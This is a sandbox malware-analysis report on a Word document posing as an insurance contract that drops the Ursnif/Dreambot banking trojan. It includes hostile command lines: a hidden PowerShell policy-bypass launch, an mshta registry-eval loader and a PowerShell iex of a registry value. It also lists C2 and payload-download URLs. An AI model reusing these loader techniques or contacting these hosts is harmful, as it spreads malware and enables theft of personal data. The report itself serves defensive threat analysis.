File name: Застрахователен договор н_00114.doc

Full analysis: https://app.any.run/tasks/ca30af44-3a08-4d46-8ab3-ba14cba67914
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 17, 2020, 18:10:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, generated-doc, loader, trojan, gozi, ursnif, dreambot, evasion
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 01:45:00 2020, Last Saved Time/Date: Fri Jan 17 01:45:00 2020, Number of Pages: 1, Number of Words: 85, Number of Characters: 487, Security: 0
MD5: ED311EA2FFEC4B4FC970BC64D51FB86D
SHA1: A97AE0632508F3648BC7953F32D7B0341126D34A
SHA256: 9CE3F98C3009F49B191E59642865B7FCC04819356A6801477075570123DA9E87
SSDEEP: 3072:aM+qyNNxyhQSZ1grOnc1sn8LRMESn9oObd1:aJ9NNeQSZ1grOnc1sn8dB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 4048)
    • URSNIF was detected

      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 1324)
    • Connects to CnC server

      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 1324)
      • explorer.exe (PID: 352)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3824)
      • cmd.exe (PID: 3140)
    • Application was injected by another process

      • explorer.exe (PID: 352)
    • Starts Visual C# compiler

      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 912)
    • Runs injected code in another process

      • powershell.exe (PID: 3792)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 352)
    • Actions look like stealing of personal data

      • explorer.exe (PID: 352)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 4048)
    • Creates files in the user directory

      • powershell.exe (PID: 4048)
      • powershell.exe (PID: 3792)
      • explorer.exe (PID: 352)
      • powershell.exe (PID: 912)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4048)
    • Executed via COM

      • iexplore.exe (PID: 720)
    • Uses RUNDLL32.EXE to load library

      • powershell.exe (PID: 4048)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 352)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 352)
    • Checks for external IP

      • nslookup.exe (PID: 2152)
    • Starts CMD.EXE for command execution

      • explorer.exe (PID: 352)
    • Loads DLL from Mozilla Firefox

      • explorer.exe (PID: 352)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 4016)
    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 2408)
    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 1972)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 896)
    • Searches for installed software

      • reg.exe (PID: 3356)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1296)
      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 720)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 352)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1296)
    • Manual execution by user

      • powershell.exe (PID: 4048)
      • mshta.exe (PID: 3824)
    • Application launched itself

      • iexplore.exe (PID: 720)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 1324)
    • Changes internet zones settings

      • iexplore.exe (PID: 720)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3532)
      • mshta.exe (PID: 3824)
      • iexplore.exe (PID: 1324)
    • Reads settings of System Certificates

      • explorer.exe (PID: 352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 571
Paragraphs: 1
Lines: 4
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 487
Words: 85
Pages: 1
ModifyDate: 2020:01:17 01:45:00
CreateDate: 2020:01:17 01:45:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
All screenshots are available in the full report
Total processes: 98
Monitored processes: 41
Malicious processes: 8
Suspicious processes: 2

Behavior graph

Graph nodes in rendered order, with the graph's own node tags kept as shown ("no specs" and "#URSNIF"; "start" and "inject" are the graph legend's edge labels):

winword.exe (no specs), powershell.exe, rundll32.exe (no specs), iexplore.exe, #URSNIF iexplore.exe, #URSNIF iexplore.exe, mshta.exe (no specs), powershell.exe (no specs), csc.exe, cvtres.exe (no specs), csc.exe, cvtres.exe (no specs), #URSNIF explorer.exe, cmd.exe (no specs), nslookup.exe, cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), systeminfo.exe (no specs), powershell.exe (no specs), csc.exe, cvtres.exe (no specs), csc.exe, cvtres.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), net.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), nslookup.exe, cmd.exe (no specs), cmd.exe (no specs), tasklist.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), driverquery.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), reg.exe (no specs), cmd.exe (no specs), cmd.exe (no specs)

Process information

PID: 1296
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Застрахователен договор н_00114.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 4048
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e [encoded command argument not reproduced in this summary]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3100
CMD: "C:\Windows\system32\rundll32.exe" C:\Users\admin\jllwqpihwzunr.bin, DllRegisterServer
Path: C:\Windows\system32\rundll32.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 720
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Exit code: 1
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3532
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:720 CREDAT:71937
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Internet Explorer
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 1324
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:720 CREDAT:203009
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Internet Explorer
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3824
CMD: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Devivmgr'));if(!window.flag)close()</script>"
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3792
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB").crypptsp))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2240
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\hn0u9ccj.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 8.0.50727.4927 (NetFXspW7.050727-4900)

PID: 2768
CMD: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES78E0.tmp" "c:\Users\admin\AppData\Local\Temp\CSC78DF.tmp"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Parent process: csc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® Resource File To COFF Object Conversion Utility
Exit code: 0
Version: 8.00.50727.4940 (Win7SP1.050727-5400)
Total events: 7 524
Read events: 6 412
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 1
Suspicious files: 11
Text files: 33
Unknown types: 15

Dropped files

All files listed below were dropped by WINWORD.EXE (PID 1296); the Type, MD5 and SHA256 fields are blank in this summary.
  • C:\Users\admin\AppData\Local\Temp\CVRA514.tmp.cvr
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D14C5934.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C27F3FA5.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAEEF962.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E011B5FB.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34EB3FC0.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A518BCC1.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC4F7BCE.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\827B5D77.wmf
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E820290C.wmf
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 13
TCP/UDP connections: 20
DNS requests: 15
Threats: 0

HTTP requests

Fields shown per request: PID (process), method, HTTP code, IP, URL, CN, type, size, reputation; fields left blank in the report are omitted.

PID: 3532 (iexplore.exe)
Method: GET
IP: 151.251.24.148:80
URL: http://ccsecure.ru/images/UQ7UQqrAF8pYxoB/FUy_2FUywdvf_2B6ph/QsasUyML2/a6Q0RosNa2ld8MtPSoei/u_2BUtaVA6FKhhMAKKO/LkGwJGWF5iELN7cjrjdIeq/2o_2FhfH0uDTc/NHcVmxct/vDiQqjz8_2FU1CKJY_2Fs7B/LMaA_2FlJ/ytA1dauV.avi
CN: BG
Reputation: malicious

PID: 352 (explorer.exe)
Method: GET
IP: 37.34.225.14:80
URL: http://buddy-calc.at/images/RWV1IM07e1/zeoQCrhxU_2Bx_2Bo/KnvtBDmBezaA/sNKsI27t5TV/3RAKbIZZCqkkN9/zIbxQVenbXwxWKrx9R45p/2BcD4rfpCBC_2FZd/345_2FW1QQ8sjkh/lx1jD0LB05WdoqHtsM/WMYTSEF8n/1dkUSgwoADekQsWWKUH5/bOpebuK_2FfmCysl79N/tw1Wuj7rsJAmdtzJcX/fl.jpeg
CN: KW
Reputation: malicious

PID: 1324 (iexplore.exe)
Method: GET
IP: 151.251.24.148:80
URL: http://ccsecure.ru/images/YTnB4UMLZyLkVKroJN/73X7BKEki/NFb5IF9uYjHQCH1WqRED/o1RcLrXnHbffrN00B_2/FxrvNhweZ827HVHId8hzUn/stLVHv6492_2B/S6w2GlSm/398FvrTPMbrKzF_2B5G5qAF/eiZ0fMknvP/vDv0q2OAtyHlwqqAZ/eSXP25zbN05lxF/b1md.avi
CN: BG
Reputation: malicious

PID: 352 (explorer.exe)
Method: GET
IP: 190.140.198.49:80
URL: http://securecc.ru/jupd32.bin
CN: PA
Reputation: malicious

PID: 352 (explorer.exe)
Method: GET
HTTP Code: 200
IP: 37.34.225.14:80
URL: http://buddy-calc.at/images/BPK1z7Z91BhOzZtDJBYvY/QJqfh1awt_2BLVyE/RvMqOHoyuk4Z1o0/VJ6mTp3NhJuWPNirme/uGpofWpZi/VrQaHoZvtJSOkilpVaoL/SuDs3V9WGnilD_2BM2w/RYzoY_2FCgPL8yMT9pWb3w/uCODGnCz7zozl/gSwtob49/Aju_2B3il8Kn_2BLF6B/7.gif
CN: KW
Type: binary
Size: 926 b
Reputation: malicious

PID: 720 (iexplore.exe)
Method: GET
HTTP Code: 404
IP: 151.251.24.148:80
URL: http://ccsecure.ru/favicon.ico
CN: BG
Type: html
Size: 564 b
Reputation: malicious

PID: 352 (explorer.exe)
Method: POST
IP: 37.34.225.14:80
URL: http://buddy-calc.at/images/SB2Jteg_/2FqnIhFNpM6_2Bj5uMVPB2G/N4tK7wYxTK/aWsKGl6l1HJz53OkX/Fz4_2B8afM2r/EF_2BFpSU2B/vuwSy9OH8oCj_2/FFubTax3vG9fGUvj7Onsa/SyiYH_2FbEbWPEYP/ghe5l9J2Yl9dIsb/cYceHzHr3eWahLS_2B/Oe8cKy7im/Q3b11wCPMK7NB55zfwAs/_2BtV7eEzbjgOWJTOrV/1vf1Qd57Xj0/_2Ba4YUK.bmp
CN: KW
Reputation: malicious

PID: 4048 (powershell.exe)
Method: GET
HTTP Code: 200
IP: 190.140.198.49:80
URL: http://securecc.ru/kfoiuyrtebnvhcgxljkjh.bin
CN: PA
Type: executable
Size: 248 Kb
Reputation: malicious

PID: 352 (explorer.exe)
Method: GET
IP: 37.34.225.14:80
URL: http://buddy-calc.at/images/LyGAnzQ5hVbd_2B1EqWywrYgBs/Fvwoe2p/lQ0O91yI9v510EwKf/RyIA7LOZMxGqHksx0ePn_2B2dQLa5Kdxzyj/RiYpA.ttf
CN: KW
Reputation: malicious

PID: 352 (explorer.exe)
Method: GET
HTTP Code: 200
IP: 37.34.225.14:80
URL: http://buddy-calc.at/images/LyG/AnzQ5hVbd_2B1EqWyw/rYgBsFvwoe2plQ0O91yI9v53dFzkfQU2p/wh4vBhVb984xc7ADnaIzVathCzu54Nf67yuOhyp9NOKrNbta0o2rhtI.ttf
CN: KW
Type: binary
Size: 324 Kb
Reputation: malicious

Connections

Fields shown per connection: PID (process), IP, domain, ASN, CN, reputation.

PID 720 (iexplore.exe): 204.79.197.200:80, www.bing.com, ASN: Microsoft Corporation, CN: US, whitelisted
PID 3532 (iexplore.exe): 151.251.24.148:80, securecc.ru, ASN: Blizoo Media and Broadband, CN: BG, malicious
PID 4048 (powershell.exe): 190.140.198.49:80, securecc.ru, ASN: Cable Onda, CN: PA, malicious
PID 352 (explorer.exe): 172.217.22.14:443, google.com, ASN: Google Inc., CN: US, whitelisted
PID 720 (iexplore.exe): 151.251.24.148:80, securecc.ru, ASN: Blizoo Media and Broadband, CN: BG, malicious
PID 1324 (iexplore.exe): 151.251.24.148:80, securecc.ru, ASN: Blizoo Media and Broadband, CN: BG, malicious
PID 352 (explorer.exe): 172.217.18.4:443, www.google.com, ASN: Google Inc., CN: US, whitelisted
PID 2152 (nslookup.exe): 208.67.222.222:53, resolver1.opendns.com, ASN: OpenDNS, LLC, CN: US, malicious
(no PID/process given): 208.67.222.222:53, resolver1.opendns.com, ASN: OpenDNS, LLC, CN: US, malicious
PID 352 (explorer.exe): 190.140.198.49:80, securecc.ru, ASN: Cable Onda, CN: PA, malicious

DNS requests

Domain
IP
Reputation
securecc.ru
  • 190.140.198.49
  • 186.87.135.97
  • 203.91.116.53
  • 181.59.254.21
  • 31.5.167.149
  • 201.189.190.227
  • 181.168.208.178
  • 95.219.150.97
  • 151.251.24.148
  • 213.222.130.75
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
ccsecure.ru
  • 151.251.24.148
  • 213.222.130.75
  • 190.140.198.49
  • 186.87.135.97
  • 203.91.116.53
  • 181.59.254.21
  • 31.5.167.149
  • 201.189.190.227
  • 181.168.208.178
  • 95.219.150.97
malicious
google.com
  • 172.217.22.14
whitelisted
www.google.com
  • 172.217.18.4
whitelisted
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
shared
curlmyip.net
  • 104.31.65.34
  • 104.31.64.34
shared
buddy-calc.at
  • 37.34.225.14
  • 37.75.49.82
  • 109.121.214.139
  • 86.105.60.33
  • 79.124.89.241
  • 92.87.103.90
  • 89.47.94.113
  • 91.83.70.44
  • 213.222.130.75
  • 79.136.8.168
malicious

Threats

Fields shown per alert: PID (process), class, message.

PID 4048 (powershell.exe) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
PID 4048 (powershell.exe) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
PID 3532 (iexplore.exe) | A Network Trojan was detected | AV TROJAN Ursnif Variant CnC Beacon 2019-09-18
PID 3532 (iexplore.exe) | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
PID 1324 (iexplore.exe) | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
PID 2152 (nslookup.exe) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
PID 2152 (nslookup.exe) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
PID 2152 (nslookup.exe) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
PID 2152 (nslookup.exe) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
(no PID/process given) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup)
9 ETPRO signatures available at the full report
Process: csc.exe
Message: *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302

Process: csc.exe
Message: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144

(The same pair of csc.exe messages appears five times in the report.)